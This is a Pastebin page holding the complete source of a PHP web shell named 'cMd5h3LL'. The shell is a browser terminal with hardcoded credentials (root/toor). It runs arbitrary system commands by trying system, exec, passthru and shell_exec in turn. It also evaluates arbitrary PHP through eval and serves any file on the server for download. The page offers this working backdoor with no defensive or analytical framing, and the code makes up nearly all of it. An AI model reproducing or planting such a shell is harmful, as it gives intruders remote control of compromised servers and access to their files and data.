API tools faq
paste
Advertisement
r13y5h4

cMd5h3LL

r13y5h4
May 26th, 2014
242
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.91 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. error_reporting(0);
  4. session_start();
  5.  
  6. $config_command_prefix = "$";
  7. $config_username = "root";
  8. $config_password = "toor";
  9. $config_welcome = "<br />Welcome! (type help if you are lost)<br />";
  10. $config_file = basename(__FILE__);
  11.  
  12. $config_command_prefix = '<span class="prefix">' . $config_command_prefix . '</span>';
  13.  
  14. if($_SESSION['terminal']['loggedin'] && isset($_GET['file'])){
  15. $file = trim($_GET['file']);
  16. header('Content-Description: File Transfer');
  17. header('Content-Disposition: attachment; filename='.basename($file));
  18. header('Content-Length: ' . filesize($file));
  19. readfile($file);
  20. exit();
  21. }
  22.  
  23. if(isset($_POST['action'])){
  24. switch($_POST['action']){
  25.  
  26. case 'command':
  27. if(isset($_POST['command'])){
  28.  
  29. $command = trim(str_replace($config_command_prefix, '', $_POST['command']));
  30. $data['command'] = $command;
  31. $data['color_command'] = color_command($command);
  32.  
  33. if(strstr($command, 'exit')){
  34. session_destroy();
  35. $data['result'] = "You are know logged out \n";
  36. response($data, 220);
  37. }
  38.  
  39. if(strstr($_POST['line'], 'username: ')){
  40. $user = trim(str_replace('username: ', '', $command));
  41. if($user == $config_username){
  42. $_SESSION['terminal']['username'] = $user;
  43. response($data, 300);
  44. }else{
  45. response($data, 310, "Incorrect username");
  46. }
  47. }
  48.  
  49. if(strstr($_POST['line'], 'password: ')){
  50. $pass = trim(str_replace('password: ', '', $command));
  51. if($pass == $config_password){
  52. $_SESSION['terminal']['password'] = $pass;
  53. $_SESSION['terminal']['loggedin'] = true;
  54. response($data, 320);
  55. }else{
  56. response($data, 330, "Incorrect password");
  57. }
  58. }
  59.  
  60. if(!isset($_SESSION['terminal']['loggedin']) && !$_SESSION['terminal']['loggedin']){
  61. response($data, 400, "Permission denied");
  62. }
  63.  
  64. if(strstr($command, 'cd ')){
  65. $path = trim(str_replace('cd ', '', $command));
  66. $_SESSION['terminal']['path'] = compress_path($_SESSION['terminal']['path'] . '/' . $path);
  67. $data['result'] = "";
  68. $data['path'] = $_SESSION['terminal']['path'];
  69. response($data);
  70. }
  71.  
  72. if(strstr($command, 'func ')){
  73. $function = trim(str_replace('func ', '', $command));
  74. $data['result'] = function_exists( $function ) ? "exist" : "doesn't exist";
  75. response($data);
  76. }
  77.  
  78. if(strstr($command, 'exec ')){
  79. $code = trim(str_replace('exec ', '', $command));
  80.  
  81. ob_start();
  82. eval($code);
  83. $content = ob_get_contents();
  84. ob_clean();
  85.  
  86. $data['result'] = $content;
  87. response($data);
  88. }
  89.  
  90. if($command != ""){
  91. $data['result'] = execute($command, $_SESSION['terminal']['function']);
  92. response($data);
  93. }else{
  94. response($data, 400, 'Empty command');
  95. }
  96.  
  97. }
  98. break;
  99.  
  100. case 'init':
  101. if(!isset($_SESSION['terminal']['function']) || $_SESSION['terminal']['function'] == ''){
  102. $commander = getValidCommandFunction();
  103. $_SESSION['terminal']['function'] = $commander;
  104. }
  105. sleep(1);
  106.  
  107. $data['commander'] = $commander;
  108. $data['loggedin'] = isset($_SESSION['terminal']['loggedin']) && $_SESSION['terminal']['loggedin'] ? true : false;
  109. response($data);
  110. break;
  111. }
  112. exit();
  113. }
  114.  
  115. function response($data, $code=200, $error=""){
  116.  
  117. $response['code'] = $code;
  118. $response['error'] = $error;
  119. $response['data'] = $data;
  120.  
  121. echo json_encode($response);
  122. exit();
  123.  
  124. }
  125.  
  126. function isWindows(){
  127. ob_start();
  128. phpinfo();
  129. $phpinfo = ob_get_clean();
  130. return preg_match('~System </td><td class="v">([^<]*Windows)~',$phpinfo) ? true : false;
  131. }
  132.  
  133. function getValidCommandFunction(){
  134. $test_command = isWindows() ? 'dir' : 'ls';
  135.  
  136. ob_start();
  137. system($test_command);
  138. $result = ob_get_contents();
  139. ob_end_clean();
  140. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'system';
  141.  
  142. $result = exec($test_command);
  143. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'exec';
  144.  
  145. ob_start();
  146. passthru($test_command);
  147. $result = ob_get_contents();
  148. ob_end_clean();
  149. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'passthru';
  150.  
  151. $result = shell_exec($test_command);
  152. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'shell_exec';
  153.  
  154. }
  155.  
  156. function execute($command, $function, $n_to_br=true){
  157.  
  158. $chdir = '';
  159. if($_SESSION['terminal']['path'] != ''){
  160. if(isWindows()){
  161. if(!@chdir( $_SESSION['terminal']['path'] )){
  162. $_SESSION['terminal']['path'] = '';
  163. $data['result'] = "You are redirected back to the original directory, because it was not allowed to open this directory.";
  164. response($data);
  165. }
  166. }else{
  167. $chdir = "cd " . $_SESSION['terminal']['path'] . "\n";
  168. }
  169. }
  170.  
  171.  
  172. switch($function){
  173.  
  174. case 'system':
  175. ob_start();
  176. system($chdir . $command);
  177. $result = ob_get_contents();
  178. ob_end_clean();
  179. break;
  180. case 'exec':
  181. $result = exec($chdir . $command);
  182. break;
  183. case 'passthru':
  184. ob_start();
  185. passthru($chdir . $command);
  186. $result = ob_get_contents();
  187. ob_end_clean();
  188. break;
  189. case 'shell_exec':
  190. $result = shell_exec($chdir . $command);
  191. break;
  192. default:
  193. $result = false;
  194. break;
  195. }
  196.  
  197. return $n_to_br ? nl2br( htmlspecialchars( $result )) : htmlspecialchars($result);
  198.  
  199. }
  200.  
  201. function compress_path($path){
  202.  
  203. $clean = str_replace('\\', '/', $path);
  204.  
  205. $clean = str_replace(array('////', '///', '//'), '/', $clean);
  206.  
  207. if(substr($clean, 0, 1) == "/") $clean = substr($clean, 1);
  208.  
  209. return $clean;
  210. }
  211.  
  212. function color_command($command){
  213. $parts = explode(' ', $command);
  214. $parts[0] = '<span class="keyword">' . $parts[0] . '</span>';
  215. return implode(' ', $parts);
  216. }
  217.  
  218. ?>
  219.  
  220. <html>
  221. <head>
  222. <title>Shell</title>
  223. <meta name="viewport" content="width=device-width">
  224. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script>
  225. <style>
  226. body{
  227. text-align: center;
  228. font-size: 11px;
  229. font-family: verdana;
  230. background-color: #000000;
  231. }
  232. table {
  233. width: 565px;
  234. }
  235. table tr td{
  236. font-family: verdana;
  237. font-size: 11px;
  238. padding: 10px 5px;
  239. border-bottom: solid 1px #000000;
  240.  
  241. }
  242. #wrapper{
  243. width: 100%;
  244. margin: 2% auto;
  245. text-align: left;
  246. }
  247. #console{
  248. height: 84%;
  249. overflow: auto;
  250. background-color: #000000;
  251. padding: 15px;
  252. font-family: monospace;
  253. font-size: 12px;
  254. color: #1fbf00;
  255. }
  256. .content{
  257. padding: 15px;
  258. }
  259. #commander{
  260. border: solid 1px #000000;
  261. padding: 5px 10px;
  262. -webkit-border-radius: 2px;
  263. -moz-border-radius: 2px;
  264. border-radius: 2px;
  265. width: 100%;
  266. font-family: monospace;
  267. font-size: 12px;
  268. color: #1fbf00;
  269. }
  270. .box{
  271. -moz-box-shadow: 1px 1px 8px #000000;
  272. -webkit-box-shadow: 1px 1px 8px #000000;
  273. box-shadow: 1px 1px 8px #000000;
  274. border: solid 1px #000000;
  275. -webkit-border-radius: 4px;
  276. -moz-border-radius: 4px;
  277. border-radius: 4px;
  278. margin: 15px 0px;
  279. background-color: #000000;
  280. }
  281. #help{
  282. width: 300px;
  283. float: right;
  284. }
  285. .prefix{
  286. color: #0077E7;
  287. }
  288. .keyword{
  289. color: #9eff63;
  290. }
  291. .error{
  292. color: #FF0000;
  293. }
  294. .spacer{
  295. clear: both;
  296. display: block;
  297. }
  298. </style>
  299. <script type="text/javascript">
  300.  
  301. var config_command_prefix = '<?php echo $config_command_prefix ?>';
  302. var config_welcome = '<?php echo $config_welcome ?>';
  303. var command_stack = Array();
  304. var command_stack_position = 0;
  305.  
  306. $(document).ready(function() {
  307. $.post("<?php echo $config_file; ?>", {action: 'init'}, function(response){
  308. var extra = response.data.loggedin ? ' Welcome! (type help if you are lost)' : ' username: ?';
  309. $("#console").html($("#console").html() + "<br />" + config_command_prefix + extra);
  310. $("#commander").attr('disabled', false);
  311. $("#commander").focus();
  312.  
  313. }, "json");
  314. });
  315.  
  316. function execute(field,event) {
  317. var theCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode;
  318. if(theCode == 38){
  319. if(command_stack_position > 0) command_stack_position--;
  320. $("#commander").val(command_stack[command_stack_position]);
  321. }else if(theCode == 40){
  322. if(command_stack_position < (command_stack.length-1)) command_stack_position++;
  323. $("#commander").val(command_stack[command_stack_position]);
  324. }else if (theCode == 13){
  325.  
  326. var command = $("#commander").val();
  327. $("#commander").val('');
  328.  
  329. command_stack.push( command );
  330. command_stack_position = (command_stack.length);
  331.  
  332. var lines = $("#console").html().toLowerCase().split('<br>');
  333. var line = lines[lines.length-1];
  334.  
  335. if(command.indexOf("download") > -1){
  336. var file = command.replace('download ', '');
  337. window.location = '<?php echo $config_file; ?>?file=' + file;
  338. return;
  339. }
  340.  
  341. if(command.indexOf("cls") == 0 || command.indexOf("clear") == 0){
  342. $("#console").html("");
  343. return;
  344. }
  345.  
  346. $.post("<?php echo $config_file; ?>", {action: 'command', command: command, line: line}, function(response){
  347. if(response.code == 200){
  348. show = (response.data.result == null) ? "" : response.data.result + "<br />";
  349. result = config_command_prefix + " " + response.data.color_command + "<br />" + show;
  350. }else if(response.code == 220){
  351. window.location = '<?php echo $config_file; ?>';
  352. }else if(response.code == 310){
  353. result = response.error + "<br />" + config_command_prefix + " username: ?";
  354. }else if(response.code == 320){
  355. result = config_welcome + "<br />" + config_command_prefix + " ";
  356. }else if(response.code == 330){
  357. result = response.error + "<br />" + config_command_prefix + " password: ?";
  358. }else if(response.code == 300){
  359. result = config_command_prefix + " password: ?";
  360. }else{
  361. result = '<span class="error">' + response.error + "</span><br />";
  362. }
  363. $("#console").html($("#console").html() + '<br />' + result ).focus();
  364.  
  365. textareaelem = document.getElementById('console');
  366. textareaelem.scrollTop = textareaelem.scrollHeight;
  367.  
  368. $("#commander").focus();
  369.  
  370. }, "json");
  371. return false;
  372. }else{
  373. return true;
  374. }
  375.  
  376. }
  377.  
  378. </script>
  379.  
  380. </head>
  381. <body>
  382.  
  383. <div id="wrapper">
  384. <div class="box">
  385. <div id="console"><?php echo $config_command_prefix ?> Loading......</div>
  386. <input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="background-color:#000000;" />
  387. </div>
  388.  
  389. <div class="spacer"></div>
  390. </div>
  391.  
  392. </body>
  393. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!